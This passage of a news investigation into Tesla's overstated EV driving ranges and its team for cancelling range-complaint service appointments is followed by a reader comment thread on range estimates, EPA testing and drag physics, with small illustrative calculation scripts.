One of the experts, Gregory Pannone, co-authored a study of 21 different brands of electric vehicles, published in April by SAE International, an engineering organization. The research found that, on average, the cars fell short of their advertised ranges by 12.5% in highway driving.
The study did not name the brands tested, but Pannone told Reuters that three Tesla models posted the worst performance, falling short of their advertised ranges by an average of 26%.
The EV pioneer pushes the limits of government testing regulations that govern the claims automakers put on window stickers, the three automotive experts told Reuters.
Like their gas-powered counterparts, new electric vehicles are required by U.S. federal law to display a label with fuel-efficiency information. In the case of EVs, this is stated in miles-per-gallon equivalent (MPGe), allowing consumers to compare them to gasoline or diesel vehicles. The labels also include estimates of total range: how far an EV can travel on a full charge, in combined city and highway driving.
"They've gotten really good at exploiting the rule book and maximizing certain points to work in their favor involving EPA tests."
EV makers have a choice in how to calculate a model's range. They can use a standard EPA formula that converts fuel-economy results from city and highway driving tests to calculate a total range figure. Or automakers can conduct additional tests to come up with their own range estimate. The only reason to conduct more tests is to generate a more favorable estimate, said Pannone, a retired auto-industry veteran.
Tesla conducts additional range tests on all of its models. By contrast, many other automakers, including Ford, Mercedes and Porsche, continue to rely on the EPA's formula to calculate potential range, according to agency data for 2023 models. That generally produces more conservative estimates, Pannone said.
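For context on what 'the EPA's formula' means here, the commonly cited two-cycle method combines the city and highway test results with a fixed 55/45 weighting and then applies an adjustment factor, widely reported as roughly 0.7 by default; the additional testing described above lets a manufacturer justify a higher factor. Treat the exact constants as approximate rather than as figures from this article:

$$ R_{\text{label}} \approx k \left( 0.55\, R_{\text{city}} + 0.45\, R_{\text{hwy}} \right), \qquad k \approx 0.7 \text{ (two-cycle default; a derived } k \text{ can be higher)} $$

That difference in k is why running the extra tests tends to produce a bigger number on the window sticker.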
Mercedes-Benz told Reuters it uses the EPA's formula because it believes it provides a more accurate estimate. "We follow a certification strategy that reflects the real-world driving behavior of our customers in the best possible way," the German carmaker said in a statement.
Ford and Porsche didn't respond to requests for comment.
Whatever an automaker decides, the EPA must approve the window-sticker numbers. The agency told Reuters it conducts its own tests on 15% to 20% of new electric vehicles each year as part of an audit program and has tested six Tesla models since the 2020 model year.
EPA data obtained by Reuters through the Freedom of Information Act showed that the audits resulted in Tesla being required to lower all the cars' estimated ranges by an average of 3%. The projected range for one vehicle, the 2021 Model Y Long Range AWD (all-wheel drive), dropped by 5.15%. The EPA said all the changes to Tesla's range estimates were made before the company used the figures on window stickers.
The EPA said it has seen "everything" in its audits of EV manufacturers' range testing, including low and high estimates from other automakers. "That is what we expect when we have new manufacturers and new technologies entering the market and why EPA prioritizes" auditing them, the agency said.
The EPA cautioned that individuals' actual experience with vehicle efficiency might differ from the estimates the agency approves. Independent automotive testers commonly examine the EPA-approved fuel-efficiency or driving range claims against their own experience in structured tests or real-world driving. Often, they get different results, as in the case of Tesla vehicles.
Pannone called Tesla "the most aggressive" electric-vehicle manufacturer when it comes to range calculations.
"I'm not suggesting they're cheating," Pannone said of Tesla. "What they're doing, at least minimally, is leveraging the current procedures more than the other manufacturers."
Jonathan Elfalan, vehicle testing director for the automotive website Edmunds.com, reached a similar conclusion to Pannone after an extensive examination of vehicles from Tesla and other major automakers, including Ford, General Motors, Hyundai and Porsche.
All five Tesla models tested by Edmunds failed to achieve their advertised range, the website reported in February 2021. All but one of 10 other models from other manufacturers exceeded their advertised range.
Tesla complained to Edmunds that the test failed to account for the safety buffer programmed into Tesla's in-dash range meters. So Edmunds did further testing, this time running the vehicles, as Tesla requested, past the point where their range meters indicated the batteries had run out.
Only two of six Teslas tested matched their advertised range, Edmunds reported in March 2021. The tests found no fixed safety buffer.
Edmunds has continued to test electric vehicles, using its own standard method, to see if they meet their advertised range estimates. As of July, no Tesla vehicle had, Elfalan said.
"They've gotten really good at exploiting the rule book and maximizing certain points to work in their favor involving EPA tests," Elfalan told Reuters. The practice can "misrepresent what their customers will experience with their vehicles."
South Korean regulators earlier this year fined Tesla about $2.1 million for falsely advertised driving ranges on its local website between August 2019 and December 2022. The Korea Fair Trade Commission (KFTC) found that Tesla failed to tell customers that cold weather can drastically reduce its cars' range. It cited tests by the country's environment ministry that showed Tesla cars lost up to 50.5% of the company's claimed ranges in cold weather.
The KFTC also flagged certain statements on Tesla's website, including one that claimed about a particular model: "You can drive 528 km (328 miles) or longer on a single charge." Regulators required Tesla to remove the "or longer" phrase.
Korean regulators required Tesla to publicly admit it had misled consumers. Musk and two local executives did so in a June 19 statement, acknowledging "false/exaggerated advertising."
Creating a diversion
By last year, sales of Tesla's electric vehicles were surging. The company delivered about 1.3 million cars in 2022, nearly 13 times more than five years before.
As sales grew, so did demand for service appointments. The wait for an available booking was sometimes a month, according to one of the sources familiar with the diversion team's operations.
Tesla instructs owners to book appointments through a phone app. The company found that many problems could be handled by its "virtual" service teams, who can remotely diagnose and fix various issues.
Tesla supervisors told some virtual team members to steer customers away from bringing their cars into service whenever possible. One current Tesla "Virtual Service Advisor" described part of his job in his LinkedIn profile: "Divert customers who do not require in person service."
Such advisors handled a variety of issues, including range complaints. But last summer, Tesla created the Las Vegas "Diversion Team" to handle only range cases, according to the people familiar with the matter.
The office atmosphere at times resembled that of a telemarketing boiler room. A supervisor had purchased the metallophone – a xylophone with metal keys – that employees struck to celebrate appointment cancellations, according to the people familiar with the office's operations.
Advisers would normally run remote diagnostics on customers' cars and try to call them, the people said. They were trained to tell customers that the EPA-approved range estimates were just a prediction, not an actual measurement, and that batteries degrade over time, which can reduce range. Advisors would offer tips on extending range by changing driving habits.
If the remote diagnostics found anything else wrong with the vehicle that was not related to driving range, advisors were instructed not to tell the customer, one of the sources said. Managers told them to close the cases.
Tesla also updated its phone app so that any customer who complained about range could no longer book service appointments, one of the sources said. Instead, they could request that someone from Tesla contact them. It often took several days before owners were contacted because of the large backlog of range complaints, the source said.
The update routed all U.S. range complaints to the Nevada diversion team, which started in Las Vegas and later moved to the nearby suburb of Henderson. The team was soon fielding up to 2,000 cases a week, which sometimes included multiple complaints from customers frustrated they couldn't book a service appointment, one of the people said.
The team was expected to close about 750 cases a week. To accomplish that, office supervisors told advisers to call a customer once and, if there was no answer, to close the case as unresponsive, the source said. When customers did respond, advisers were told to try to complete the call in no more than five minutes.
In late 2022, managers aiming to quickly close cases told advisors to stop running remote diagnostic tests on the vehicles of owners who had reported range problems, according to one of the people familiar with the diversion team's operations.
"Thousands of customers were told there is nothing wrong with their car" by advisors who had never run diagnostics, the person said.
Reuters could not establish how long the practice continued.
Tesla recently stopped using its diversion team in Nevada to handle range-related complaints, according to the person familiar with the matter. Virtual service advisors in an office in Utah are now handling range cases, the person said. Reuters could not determine why the change was made.
On the road
By the time Alexandre Ponsin reached California on his March road trip, he had stopped to charge his Model 3's battery about a dozen times.
Concerned that something was seriously wrong with the car, he had called and texted with several Tesla representatives. One of them booked the first available appointment in Santa Clara – about two weeks away – but advised him to show up at a Tesla service center as soon as he arrived in California.
Ponsin soon received a text saying that remote diagnostics had shown his battery "is in good health."
"We would like to cancel your visit for now if you have no other concerns," the text read.
"Of course I still have concerns," Ponsin shot back. "I have 150 miles of range on a full charge!"
The next day, he received another text message asking him to cancel the appointment. "I am sorry, but no I do not want to close the service appointment as I do not feel my concerns have been addressed," he replied.
Undeterred, Ponsin brought his car to the Santa Clara service center without an appointment. A technician there told him the car was fine. "It lasted 10 minutes," Ponsin said, "and they didn't even look at the car physically."
After doing more research into range estimates, he said he ultimately concluded there is nothing wrong with his car. The problem, he said, was that Tesla is overstating its performance. He believes Tesla "should be a lot more explicit about the variation in the range," especially in very cold weather.
"I do love my Tesla," the engineer said. "But I have just tempered my expectation of what it can do in certain conditions."
Range Rage
By Steve Stecklow in London and Norihiko Shirouzu in Austin
Additional reporting by Heekyong Yang and Ju-min Park in Seoul and Peter Henderson in San Francisco
Art direction and lead illustration: Eve Watling
Video Production: Lucy Ha and Ilan Rubens
Edited by Brian Thevenot
Not just battery and range.
I've had problems with the passenger-side airbag not enabling, and the turn signal not working. Both are scary issues. I made appointments with support. Both were cancelled outright by them (!). They tried to convince me that there was no problem, and that it was all due to the way I use the car. They seemed to try everything to get out of appointments. My wife had to use the back seat for a month while I argued with them.
Eventually both problems were resolved by software updates, proving that the problems were indeed on their side.
'turn signal not working.' Oh that explains why Tesla drivers never seem to signal! ;-)
Seriously, sorry you've had such a bad experience with Tesla service.
I thought it was just me! Trying to control the turn signals is beyond infuriating in a Model Y. You would think that this would be part of the functionality that is largely free of bugs...
'My wife had to sit at the back of the car for a month while I argued with them.'
She must have enjoyed having a chauffeur for a month...
> My wife had to use the back seat for a month
Is the back seat safer than the front seat, even if the front seat airbag doesn't deploy? I know recent tests show the back seat is a good bit less safe, and I think it's primarily due to most manufacturers not using the same seat belt technology as they do in the front, but maybe some of that is the lack of a front airbag.
The airbags needing a software update in the first place is terrifying.
Since cars have integrated phone-home diagnostic software, why would the government even allow automakers to advertise 'estimated' ranges for specific car models and not simply show actual averages?
I had an Uber driver who said his 3 had less than half the range when temperatures got over 100F (38C). I imagine that is just the increased load from the cooling system. My Y sounds like a combustion car, the AC runs so loud these past couple of months. I leave the display on battery percentage because the range counts down very quickly in this heat, but it doesn't when it's nice out. Cold decreases the range because the battery heater has to work hard.
My point is that it isn't as simple as an average, due to the massive temperature sensitivity. It applies to ICE cars too, but it certainly isn't as noticeable, since the engine tolerates a wider range of temperatures. Ironically, the EV is proposed as something to battle climate change, but it is much more susceptible to its effects.
That gets affected by the kind of people driving the car, and just because I buy a certain car doesn't mean I'm like the other people who bought it. Also, too easy to hack that.
The article ends:
> [one customer] ultimately concluded there is nothing wrong with his car. The problem, he said, was that Tesla is overstating its performance
As I read this, either his car was defective or he was lied to in order to convince him to make a $XX,000 purchase. It seems that Tesla should be facing some form of fraud-based lawsuit over the lies told when selling the car or servicing it under warranty, right?
Tesla has more lawyers than you do. Bringing a lawsuit for fraud, which you may not win, will cost you $10-20k cash out of pocket up front.
Tesla advertises the EPA rated range. The car not actually achieving that range in real world conditions (which are more varied than the test conditions) is not necessarily defective or false advertising.
Now I do think that the EPA ratings are inadequate and inconsistent. Those could use some improvement to better reflect real world driving conditions.
Most normal Tesla owners I'm familiar with just come to accept that the website range claim is complete horseshit. They go on with their lives and just don't worry about it. For around town, it'll get somewhat close to rated range anyway, and road trips aren't that common for most people. The supercharger network is pretty good, and if you have to stop every 200 miles instead of the rated 358, then so be it.
Personally I think the EPA should revamp the rating system. I want to see every manufacturer forced to admit what range to expect if we use 90% of the battery capacity, at 70 mph, in 32F ambient temperature with climate control set to 68F. The only time people really care deeply about range is on the interstate, so the range numbers really ought to reflect that.
Many who buy EVs have range anxiety. Easiest solution for Tesla? Lying about the (remaining) range.
Many consumers wrongly believe that they need a lot more range than they actually do, and you can't really convince them otherwise because it's an emotional issue rather than a pragmatic one. What Tesla did was immoral but I get why they did it.
Tesla doesn't let you get stranded on the side of the road. You'll still get directed to a Supercharger if you are unable to reach your destination. But you don't get an accurate range estimate when your car is fully charged, and this has been known for a long time.
Thanks Tesla, but I'll stick to a car that doesn't try to work around my emotional problems.
> Tesla doesn't let you get stranded on the side of the road
Unless you don't use their nav, the conditions are bad, or you need to take a detour. To drive 40mi, I want 60mi range to cover my bases, considering the consequences of getting stuck vs just charging a little longer.
A lot of comments are discussing the difficulty of estimating range accurately, or how all EPA estimates are inflated. But the article claims Tesla knowingly uses an algorithm with inflated numbers and swaps the rosy estimate out for a more accurate estimate at 50% charge. That's the difference between a good-faith attempt at estimating range and a dark pattern.
I was trying to interpret what that means. I'm guessing they aren't factoring in current conditions above 50% and instead rely on average conditions. I'd be surprised if this is actually worse than what the EPA views as average, given the truth-in-advertising requirements they put on Tesla.
This isn't entirely unreasonable. Most people whose battery is at 80% aren't going to be depleting it in the next few hours, so, say, factoring in the present cold morning might produce overly pessimistic guesses.
They are being aggressive, for sure, but this article strikes me as pretty biased against Tesla. The article concedes that most of these customers have no range problems -- they are probably driving in the cold at 80 MPH, blasting their heat to 70 degrees, wondering why their range is so poor -- even though that is entirely expected behavior.
When you market cars based on known false numbers, it sounds a lot like criminal fraud.
Man. I love my Tesla (please car manufacturers hire good software engineers, pay them better and let them do their thing).
But screw that guy. I don't think we'll be buying another one.
It's time for a class action lawsuit and to be rid of him.
I just hope some car manufacturers continue to not hire UX designers and have everything not related to the actual operation of the car (controlled by physical switches) just be a dumb screen for my phone to control.
That's a pretty damning article and it looks like there are more and more of those coming.
Tesla still somehow benefits from its innovators / clean company reputation, but at this pace it won't be long before agencies start to act on what's become much more than just 'optimistic marketing'.
I think that reputation already died in the last 2-3 years.
It's now pretty common in my circle to hear people say they'll pay a premium to not own a Tesla. Primarily because of lots of bad experiences with build quality/repairs, but also because there are now lots of high quality alternatives. Namely Rivian and Lucid, but also the legacy automakers (two friends bought mach-es recently and there's a smattering of F-150 lightnings.)
The fact that Musk has adopted the public persona of a crazy uncle who doesn't get Thanksgiving invites -- and is heavily associated with the Tesla brand -- doesn't help either.
I'd like to see more data...
For example, if you get 10 tesla cars of the same model, do the ranges differ?
If you get 1 car and 10 different drivers, do some drivers get the advertised range while others don't?
If you disassemble the battery packs, do you find some bad/degraded cells in cars with reduced range, or is this a design fault?
Do drivers that have trouble have inefficient mods, like roof racks, big wheels, etc?
>agencies start to act
Uber is still a publicly traded company, despite explicitly starting up by just ignoring and bypassing existing regulation.
The US is so anti-consumer it will never relevantly punish a business making money.
> "We're looking at the range, and you literally see the number decrease in front of your eyes," he said of his dashboard range meter.
Well, I'm not sure what the range meter is supposed to do? Freeze when an eye tracker detects the driver looks at it?
Or maybe he was idling the car in cold weather. Even without the heater running, the battery cools down and that can reduce the range.
Electric vehicles aren't perfect and some little education can prevent a lot of frustration.
That's the crux of the complaint, though: if the number requires education, it should not be used without context, and something more realistic should be used instead. If on average the car does 250 miles, it should not be advertised as 400. Either a range or a disclaimer should be present.
I think the 'number decreasing' complaint is related to the fact that you would drive 10 miles and lose 30 on the dash. The article also claims the number becomes more realistic when it crosses below 50% charge, so I expect this difference to be noticeable.
How does the Tesla advertised range compare to the advertised range of other EV makers: less accurate, or similarly inaccurate?
edit: by 'advertised' I mean the range shown on the dash, i.e. the range communicated by the car itself, as relevant to this article.
This might help but requires you do some cross referencing and math: https://ev-database.org/cheatsheet/range-electric-car
This is better as it shows the claimed range, and the actual range: https://insideevs.com/reviews/443791/ev-range-test-results/
I mean, I realise that reading the article is considered most improper on this website, but it _is_ addressed.
I frequently drive a Skoda Enyaq. The 'official range' figure is 330 miles, but we actually get 250-290 miles in real life usage depending on temperature. When you turn the car on with a full battery, the range estimate for us reflects actual distance not 'official' distance and seems extremely accurate and trustworthy.
It's a bit average. It's not crazy optimistic like some Chinese brands or a bit pessimistic like some German brands.
Here is a Norwegian winter test in real conditions: https://nye.naf.no/elbil/bruke-elbil/test-rekkevidde-vinter-...
You can use a translator (Google, DeepL, ChatGPT...), but the Arabic numerals are easy to spot.
One datum: our 2014 BMW i3 (ev, no range extender) consistently outperformed its rated range.
> How does the Tesla advertised range compare to the advertised range of other EV makers: less accurate, or similarly inaccurate?
Read the article. This is covered in depth and it's quite informative.
My 2015 85D's battery, with only 70k miles, died the day after the warranty expired.
$15k to have them put in another refurbished, 8-year-old battery. And they kept mine to resell to someone else for $15k.
Any other company I'd say it's a coincidence. But I suspect it was suppressing errors during the warranty period :/
Don't you think if there was an intentional conspiracy to do this they would make it a little less obvious by not activating battery self destruct the day after the warranty ended? I'd have made it wait at least a month afterwards...
I don't really get the range complaints at this point; with an ICE vehicle, people rarely know their range, they just look at a gauge going from F to E.
With the superchargers, range doesn't really have a material effect anymore and most of the time the network isn't necessary anyway.
It's not a real issue.
That's because, even today, gas stations are far more ubiquitous than charging stations. People who own IC cars don't pay that much attention to range because there's rarely a question that they'll find a gas station within their last remaining gallon. With electric, that's a bit of a different story, especially when you're driving a long distance, and to somewhere that's not a major metropolitan city with thousands of Tesla owners.
> It's not a real issue.
+1. I was worried about range before I bought a Model Y, but with charging at home and the trip planner, I never even think about range anxiety at all.
The driving range isn't bad though. You just need to know what you're getting into when you do your research. I'm not justifying Tesla. I'm saying that most complaints are users who don't research the product before using it. This gives me a headache.
> You just need to know what you're getting into when you do your research.
If only they didn't have a secret team to suppress the kind of things you would really want your research to turn up.
As a Tesla owner, I think the source of the confusion is the EPA range displayed in the HUD on the Tesla. We toggled ours to show the battery percentage, which is much more useful to us.
We've never owned a gas vehicle that met its EPA range and the Tesla is no different. No one takes EPA MPG * GALLONS of gas and expects it to be a real-life estimate of range.
Wind resistance increases EXPONENTIALLY with speed. Drive a little over the speeds the EPA used to determine range, and the observed range will drop significantly as a percentage when compared to the EPA range for any vehicle.
If you do have a Tesla, you'll quickly find out that the trip computer is very accurate. The worst I've seen is a cold January day in Wisconsin (-10F) while on a road trip with a head wind. In that scenario, the trip computer was off by 7% mostly due to the head wind. In the summer, it is spot on usually within 1 - 2%.
I had a Mazda 3 once which would routinely beat its EPA estimates, especially highway driving. You are too forgiving of Tesla's business gimmicks
I drove a Tesla for over a month and it was a relief to go back to my Honda Civic. The range (both miles and %) was wildly inaccurate. If I had to drive anywhere that wasn't a few miles within the city, I was under constant anxiety. No thank you.
It's a wonder to me that anyone would ever trust anything Elon Musk ever says about anything. He's a proven liar and creates an openly hostile, negative culture wherever he goes. I feel sorry for people who are caught up in his lies, either customers or employees or people who work closely with him and have to suffer his tantrums. There was a point I admired him, but that is long past.
>Wind resistance increases EXPONENTIALLY with speed.
And the power required to move against the air is the cube, not the square!
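To put rough numbers on that: drag force grows with the square of speed and drag power with the cube. A minimal sketch, with an assumed air density and a ballpark drag area for a sedan (neither figure comes from the comments above):

# Rough sketch: how aerodynamic drag scales with speed.
# Assumed numbers: air density 1.2 kg/m^3, drag area Cd*A ~ 0.7 m^2 (generic sedan).
RHO = 1.2   # air density, kg/m^3 (assumed)
CDA = 0.7   # drag coefficient * frontal area, m^2 (assumed)

def drag_force(v_mps):
    """Drag force in newtons: F = 0.5 * rho * CdA * v^2."""
    return 0.5 * RHO * CDA * v_mps ** 2

def drag_power(v_mps):
    """Power to overcome drag in watts: P = F * v, i.e. proportional to v^3."""
    return drag_force(v_mps) * v_mps

def mph_to_mps(v_mph):
    return v_mph * 0.44704

for speed in (55, 65, 75):
    f = drag_force(mph_to_mps(speed))
    p = drag_power(mph_to_mps(speed))
    print(f"{speed} mph: drag {f:,.0f} N, drag power {p / 1000:.1f} kW")
# Going from 55 to 75 mph multiplies drag by (75/55)^2 ≈ 1.86
# and drag power by (75/55)^3 ≈ 2.54.

Per mile travelled, the energy spent on drag scales with the square of speed, which is why a small bump in cruising speed eats a disproportionate chunk of range.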
FWIW, our Audis (Q5, A6 Allroad) get significantly better MPG than advertised.
The Q5 advertises 28 mpg on the highway but I consistently hit 30+ here.
And the wagon hits 35 mpg on the highway very often even though it only advertises 26. It actually turns off 2 of the 6 cylinders when it senses that it can.
Both cars I've owned have had better efficiency, and thus range, than advertised (a Honda and a Subaru). I'm often shocked at how I can get 38-40+ mpg on a car that is supposed to get 29 mpg.
> We've never owned a gas vehicle that met its EPA range and the Tesla is no different. No one takes EPA MPG * GALLONS of gas and expects it to be a real-life estimate of range.
Because gas stations are still far more common than fast chargers. We'll get there with EV charging, but right now range does matter, especially if you routinely see half of what was advertised.
I think this is a problem because a lot of what people use to shop for an EV is the headline range number, which you are declaring is not accurate. This is false advertising.
I think the difference is that a gas-powered car will keep driving when the gas indicator hits zero. You can still get a couple dozen miles at that point, and those miles are so important. Tesla is really doing you a disservice by not accounting for that.
Aerodynamic drag increases as a square as a function of velocity, not exponentially.
My 2021 Honda CR-V doesn't get close to EPA MPG but the range calculator is still accurate to within maybe 15%. I've tested it a few times driving from Oakland to LA which is right around the full range of the car and it gets pretty close- even with a whole mountain range to drive over north of LA. It doesn't appear to use EPA MPG for its estimates and it makes for a better experience.
> We've never owned a gas vehicle that met its EPA range and the Tesla is no different. No one takes EPA MPG * GALLONS of gas and expects it to be a real-life estimate of range.
Why is this exactly? It's been true - MPG is lower than estimated - of every vehicle I've owned too except for my most recent, a '23 MX-5 (i.e. a sports car, which I tend to drive at higher RPMs and in lower gears.) I'm getting spot-on or a little above the EPA estimated on the car I'd least expect it.
(edited to clarify 'it's been true')
The article says that Tesla knowingly overestimated their numbers. Tesla even switches the range algorithm to be more accurate once the charge drops to around 50%.
> We've never owned a gas vehicle that met its EPA range and the Tesla is no different
Car and Driver's EPA range versus real world highway tests:
https://www.caranddriver.com/news/a43657072/evs-fall-short-e...
EVs are quite different to ICE when it comes to EPA range ratings.
My EPA highway rating is lower than what I see in actual driving in my ICE. The city figure is about accurate, unless I've been stuck in a lot of traffic, given the look-back window it uses for its live mpg estimates. Lots of owners of other EV brands, and the article itself, say their estimates are much better than Tesla's as well. It's difficult to see how the issue is anything but specific to Tesla and its method of presenting info to consumers. They were even forced to lower their previously stated range, per the linked article.
This is what small claims court is for. No lawyers. Cheap. Just a video of the real range, the lies, and you get a $20k (or whatever) rebate due to the lies.
Last I checked, small claims court in more than one state tops out at well under $10K. Hence the adjective "small".
IOW, you ain't getting $20K out of small claims court.
"In March, Alexandre Ponsin set out on a family road trip from Colorado to California in his newly purchased Tesla, a used 2021 Model 3. He expected to get something close to the electric sport sedan's advertised driving range: 353 miles on a fully charged battery.
He soon realized he was sometimes getting less than half that much range, particularly in cold weather – such severe underperformance that he was convinced the car had a serious defect."
He simply does not understand how batteries and power delivery work. Driving through the Rocky Mountains will reduce mpg significantly for an internal combustion engine as well. Colder temperatures require running the heater and make batteries less efficient due to the increased viscosity of the electrolyte. All a perfect storm for poor EV performance.
They come up with the range under absolutely perfect driving conditions that don't actually exist. The test conditions should reflect normal driving conditions.
> Driving through the Rocky mountains will reduce mpg significantly for an internal combustion engine as well.
Do you mean it will reduce the mpg because of reduced air density, or because of temperature as well? I thought the efficiency of an ICE was dependent on the difference in temperature it creates between the combustion and the coldest part of the cycle. It seems efficiency would improve in cold temperatures because less energy would be wasted cooling the engine since the incoming air is doing that.
Sure, but the system continues to make extremely optimistic (and unrealistic) estimates about your range until you hit 50% battery, at which point it tries to be more realistic so that it doesn't strand you in the middle of nowhere.
It should be giving you the more realistic estimate as soon as possible, so that you can plan better, rather than misleading you for half your trip.
Perhaps the range advertised should call out the variance, or use a more pessimistic number?
Much like MPG is denoted as city vs highway.
It's a controversial opinion, but I really believe EVs need 500 miles of range to truly compete with ICE vehicles.
Think: batteries not fully charging or depleting for longevity concerns. Having to stop at chargers before range is out due to there not being another one coming up, extra headwinds, extra heat or AC, simply ending up at a broken or crowded charger and needing it to a different one, pulling a load, etc, etc.
Most people never leave their city.
For those of us who do, the small number that do road trips can easily get by with one ICE and one EV.
Most people's EV need to get to the grocery store or to work and back.
Maybe it's more important to have more/faster EV charging stations. I'm not buying an EV until I can go to any regular gas station (or at least half of them) and charge it up in a similar timespan as an ICE. That should be doable.
I'd like to be able to go 200 miles at 85 mph, and do it between 80% and 20% of charge (so I can supercharge quickly and not worry about range at the bottom end). That would equate to a single stop on my typical family road trip. That's 333 miles at 85 mph. My Model 3 can't do that. Hoping the high end Cybertruck can get close.
I think you're wrong. The vast majority of 'trips' are well below current ranges afforded by today's technology. Most electric car users are plugging in when they get home and never have to charge elsewhere.
Furthermore battery technology is actually improving and the trajectory seems to indicate that there will be cars that will be able to hit the 1000km range within the next 5 years for those who would need it.
Is there some huge percentage of people that road trip every week? I commute to/from work, run errands, go around town, and my car is back in my garage about 340 days a year. I drive over 250-300 miles in a day maybe 4 times a year. If I am plugging my car in every night or every other night, I'm only going to need to think about Fast Chargers a few times a year. Either people are treating EVs like ICE cars and 'filling up' at a Fast Charger instead of just plugging their car in at the end of the day, or people are taking way more road trips than I realize.
ICE vehicles have the same issue with range, but we don't focus so much on it, I think because we just believe that the range is enough, and if I need to refuel I can do that just about anywhere, quickly. In those cases where we are heading into an area where that might not be true, we check our fuel and ensure we're topped up to get all the way through.
I wonder if the reason is focusing on a specific range, rather than a fuel capacity. Gallons is a pretty intuitive quantity that people are comfortable understanding. Maybe we need to focus away from range for EVs and instead focus on kWh capacity of the batteries. This is apparently less useful, since I really care about actual range - but it's more accurate and allows me to use my human understanding to think about whether I have enough relative to my driving circumstances. Just like with gallons of gas.
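For what it's worth, the kWh framing really is just a division. A minimal sketch, with assumed round numbers for the pack size and per-mile consumption (none of these figures come from the comment above):

# Sketch of the "think in kWh, not miles" idea: range is usable energy
# divided by consumption, and consumption is what actually varies.
# All numbers below are assumed, round figures for illustration.
usable_kwh = 72.0  # usable battery capacity, kWh (assumed)

scenarios_wh_per_mile = {
    "mild weather, 55 mph": 240,
    "75 mph highway":       330,
    "winter, heater on":    400,
}

for name, wh_per_mile in scenarios_wh_per_mile.items():
    miles = usable_kwh * 1000 / wh_per_mile
    print(f"{name}: ~{miles:.0f} miles")
# Prints roughly 300, 218, and 180 miles from the same battery.

The pack size never changes; everything people argue about is really the Wh/mile line, which is exactly what a single headline range figure hides.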
can you expand on how ICE vehicles have the same issue with range?
I rode ebikes for commuting about 15 years ago. Looking at electric cars, I need at least double whatever specs they state for max range. So if I need 400 miles, for instance, I need to find a manufacturer promising 800. Wind, cold, age of battery, emergency reserve, etc. all play into it.
Why do they call it a 'secret team'? Why do they call it 'complaints'?
As said in the article, these are not complaints, but service appointments. Creating a team to handle these unnecessary appointments is completely normal. There's nothing secret about this team.
I was confused too. Title and first part suggested they were trying to suppress discussion about range issues. Then the rest was about cancelling service appointments. I'm pretty sure this is just a hit piece.
This really shouldn't be read as a defense of EV companies, but I think there is just a learning curve for EVs which people really haven't grappled with yet.
Here is a minor list of things which will reduce range pretty significantly:
- Driving over 50 MPH
- Using the AC
- Using the heat
- Driving in extreme cold or extreme heat
- Driving in an area with a lot of hills. (From what I can tell regenerative braking makes up less than it loses for a given hill. If anyone can correct me here, let me know)
- Accelerating more than necessary
- Not making full use of regenerative braking
- Driving on the highway rather than around town (see the 50 MPH comment)
Are these concessions OK? Is it just a matter of better education and more honest marketing? That's sort of for everyone to decide collectively. One thing that is for sure is that EVs have a totally different set of quirks and limitations than ICE vehicles, and that will have to be adjusted for one way or another. It's also worth noting that most of the things listed above _also_ adversely affect ICE vehicles, however not necessarily as much, or it's not felt directly because getting gas is very convenient.
It also strikes me that anything which adversely affects MPG in an ICE vehicle can also be said to "reduce range." You're losing miles off your current tank of gas. Presumably because the range is so small, and recharge opportunities are so limited, this affects people in EVs more strongly than in ICE vehicles. Perhaps if both were improved (battery capacity and charging infrastructure) then these concerns would evaporate.
What you say about the reduced range makes sense, but I don't fully trust that the decision on what range to show had all the right motives here, when many other manufacturers (also in ICE vehicles) adjust their shown range based on recent drives. Tesla does do this if you plan a route, so they are certainly capable, but unlike the Toyotas, BMWs, etc. mentioned, they choose to use the unchanging, unrealistic estimate that gets a lot of people in trouble. Given that they also stonewall on issues that people can't affect with their driving style, or that can be a matter of opinion, I don't feel inclined to give them the benefit of the doubt and say maybe people should adjust their behaviour and expectations. If drivers were given more accurate mileage by default, it would be much easier for them to make those considerations and realise what affects it.
I have a mental model which goes something like this:
When 80% of your energy goes to waste, then all the incidentals like AC and especially heating just don't surface as contributing factors.
When, however, 80-90% of the energy goes to driving, then speed and all the accessories start having a real impact.
It also shows how energy-dense gasoline/diesel are: a 50 kg tank will outperform 400 kg of batteries even with the 4-5x efficiency difference.
> Here is a minor list of things which will reduce range pretty significantly:
Bit of a sarcastic take: apparently also use of indicators.
Actually, gas cars have the best range on highways because the engine can stay at peak efficiency; electric cars are best in the city because they only use energy when moving and can recover energy from slowing (i.e. stop and go). And others mentioned that heating is free in gas cars (in fact it might improve your cooling and thus efficiency).
What does any of this have to do with the fact that Tesla is lying to its customers and the other EV manufacturers are not?
> - Driving on the highway rather than around town (see the 50 MPH comment)
That would greatly depend on the town one is picturing. In pretty much any neighborhood in LA, there's no way you're going to sustain a speed of 50 mph for any reasonable period of time without frequently stopping at intersections, your usual traffic congestion, pedestrians wandering into the street, other drivers making idiotic maneuvers, etc. No way is your mileage going to be better on surface streets even if you do your best to reach 50 mph but not exceed it. Frequently braking and accelerating requires more gas than will be eaten up by driving at a constant speed of 65 mph.
>Inside the Nevada team's office, some employees celebrated canceling service appointments by putting their phones on mute and striking a metal xylophone, triggering applause from coworkers who sometimes stood on desks.
It's weird how this sentence was probably supposed to surprise the reader, but I really just reflected on how the fans conduct themselves regularly and thought "yup, sounds about on par".
Why a xylophone and not a bell? Seems like an odd choice of instrument, other than its name also starting with an x...
> I really just reflected on how the fans conduct themselves regularly
Reminds me of that YouTube video (by a fan) where he almost has an accident on Autopilot and his first reaction is 'we're gonna have to cut that out'.
This is standard Weird Sales Culture stuff, but it's a bit odd for customer support.
Just like a scene out of The Wolf of Wall Street. This company appears to be fraudulent to the very core.
I have an S so I'm biased but this feels like a hit piece.
Range is of course always going to be an estimate. Marketing is always going to be a battle of who has the bigger number. Having people schedule an appointment to fix their 'broken' cars that can only go 470 instead of 500km is of course going to be a waste of time and money.
I'm part of a facebook group for tesla owners and literally every day this week there has been a post that goes something like 'I left my house with 500km, drove 1km and now it says 497km. Should I schedule an appointment?' With the common advice being to switch to % instead of distance and remember that it's an estimate.
While I think Tesla (and most manufacturers) could do a better job at education, and of course having empathy for people who have spent a lot of money on something and worried it's defective, I don't think anything in this article is as damning as it sounds.
You should have higher expectations of your vehicle.
My 2016 ICE car's 'miles left' meter is accurate to +/- 2 miles from the moment I top up the tank (80% highway driving, 20% hilly city and rolling country roads).
IMO, accurately telling the vehicle operator how many miles of juice you have left is a KPI, as it informs when you'll need to plan for refueling.
Having driven an EV for a few weeks in identical conditions, this inaccuracy is probably the major contributor to 'range anxiety'. I have no idea whether I'll need to recharge in 60 miles or in 25 miles, and that's totally unacceptable in most parts of the US (where there aren't available chargers every 5 miles of your trip).
